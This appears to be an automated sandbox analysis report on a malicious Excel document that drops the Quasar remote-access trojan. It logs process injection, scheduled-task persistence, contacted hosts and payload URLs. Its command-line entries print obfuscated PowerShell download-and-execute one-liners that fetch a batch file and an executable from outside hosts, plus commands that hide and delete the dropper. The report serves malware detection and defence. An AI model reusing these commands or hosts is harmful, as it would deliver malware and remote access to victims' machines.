Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\sp.exe Memory written: C:\Users\user\AppData\Roaming\sp.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Memory written: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Memory written: unknown base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Roaming\sp.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Roaming\sp.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown

Language, Device and Operating System Detection:

barindex
Yara detected Obfuscated Powershell
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\Documents\pd.bat, type: DROPPED
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0040EA7D cpuid 28_2_0040EA7D
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: GetLocaleInfoW, 28_2_0058E1F1
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: ___crtGetLocaleInfoEx, 28_2_0058E2F3
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Queries volume information: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Queries volume information: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006A23D1 GetSystemTimeAsFileTime, 28_2_006A23D1
Source: C:\Users\user\AppData\Roaming\sp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Quasar RAT
Source: Yara match File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
Searches for user specific document files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\attrib.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\attrib.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\user\Documents Jump to behavior

Remote Access Functionality:

barindex
Yara detected Quasar RAT
Source: Yara match File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 336545 Sample: spetsifikatsiya.xls Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 106 Malicious sample detected (through community Yara rule) 2->106 108 Multi AV Scanner detection for dropped file 2->108 110 Sigma detected: Scheduled temp file as task from temp location 2->110 112 17 other signatures 2->112 14 EXCEL.EXE 86 29 2->14         started        process3 signatures4 140 Obfuscated command line found 14->140 142 Document exploit detected (process start blacklist hit) 14->142 17 cmd.exe 14->17         started        19 cmd.exe 14->19         started        22 cmd.exe 14->22         started        24 2 other processes 14->24 process5 signatures6 26 powershell.exe 7 17->26         started        114 Obfuscated command line found 19->114 28 powershell.exe 16 10 19->28         started        32 powershell.exe 6 22->32         started        35 powershell.exe 7 24->35         started        37 powershell.exe 7 24->37         started        process7 dnsIp8 39 cmd.exe 26->39         started        100 cutt.ly 172.67.8.238, 443, 49167 CLOUDFLARENETUS United States 28->100 102 37.46.150.139, 49169, 80 IWAYCH Moldova Republic of 28->102 92 C:\Users\user\Documents\pd.bat, ASCII 28->92 dropped 104 Powershell drops PE file 32->104 42 attrib.exe 35->42         started        file9 signatures10 process11 signatures12 128 Obfuscated command line found 39->128 44 cmd.exe 39->44         started        47 cmd.exe 39->47         started        49 mode.com 39->49         started        process13 signatures14 134 Suspicious powershell command line found 44->134 136 Tries to download and execute files (via powershell) 44->136 51 powershell.exe 8 44->51         started        process15 dnsIp16 94 gtp.bg 195.191.149.103, 49170, 49175, 49191 SUPERHOSTING_ASBG Bulgaria 51->94 76 C:\Users\user\AppData\Roaming\sp.exe, PE32 51->76 dropped 55 sp.exe 5 51->55         started        file17 process18 file19 80 C:\Users\user\AppData\Local\...\tmpCF32.tmp, XML 55->80 dropped 82 C:\Users\user\AppData\...\gUuYfpYBjYgU.exe, PE32 55->82 dropped 130 Injects a PE file into a foreign processes 55->130 132 Contains functionality to hide a thread from the debugger 55->132 59 sp.exe 1 18 55->59         started        64 schtasks.exe 55->64         started        66 sp.exe 55->66         started        signatures20 process21 dnsIp22 96 yz.videomarket.eu 185.157.162.81, 1972, 1973, 49171 OBE-EUROPEObenetworkEuropeSE Sweden 59->96 98 gtp.bg 59->98 84 C:\Users\user\...\eyBLwzbrUF1mwXoy.exe, PE32 59->84 dropped 86 C:\Users\user\...\ars4t7gFPGrepVgh.exe, PE32 59->86 dropped 88 C:\Users\user\...\5DVxvgK9jn5gaBl[1].exe, PE32 59->88 dropped 90 C:\Users\user\...\5DVxvgK9jn5gaBl[1].exe, PE32 59->90 dropped 138 Hides threads from debuggers 59->138 68 eyBLwzbrUF1mwXoy.exe 59->68         started        72 ars4t7gFPGrepVgh.exe 59->72         started        file23 signatures24 process25 file26 78 C:\Users\user\AppData\Roaming\JrekdQ.exe, PE32 68->78 dropped 116 Multi AV Scanner detection for dropped file 68->116 118 Detected unpacking (changes PE section rights) 68->118 120 Detected unpacking (overwrites its own PE header) 68->120 122 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 68->122 74 schtasks.exe 68->74         started        124 Machine Learning detection for dropped file 72->124 126 Injects a PE file into a foreign processes 72->126 signatures27 process28
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.8.238
 unknown United States
13335 CLOUDFLARENETUS true
208.95.112.1
 unknown United States
53334 TUT-ASUS false
195.191.149.103
 unknown Bulgaria
201200 SUPERHOSTING_ASBG true
185.157.162.81
 unknown Sweden
197595 OBE-EUROPEObenetworkEuropeSE true
37.46.150.139
 unknown Moldova Republic of
8758 IWAYCH false

Contacted Domains

Name IP Active
cutt.ly 172.67.8.238 true
yz.videomarket.eu 185.157.162.81 true
gtp.bg 195.191.149.103 true
ip-api.com 208.95.112.1 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat false
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://gtp.bg/opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe false
  • Avira URL Cloud: safe
 unknown
http://ip-api.com/json/ false
    		high
    http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe true
    • Avira URL Cloud: safe
    		 unknown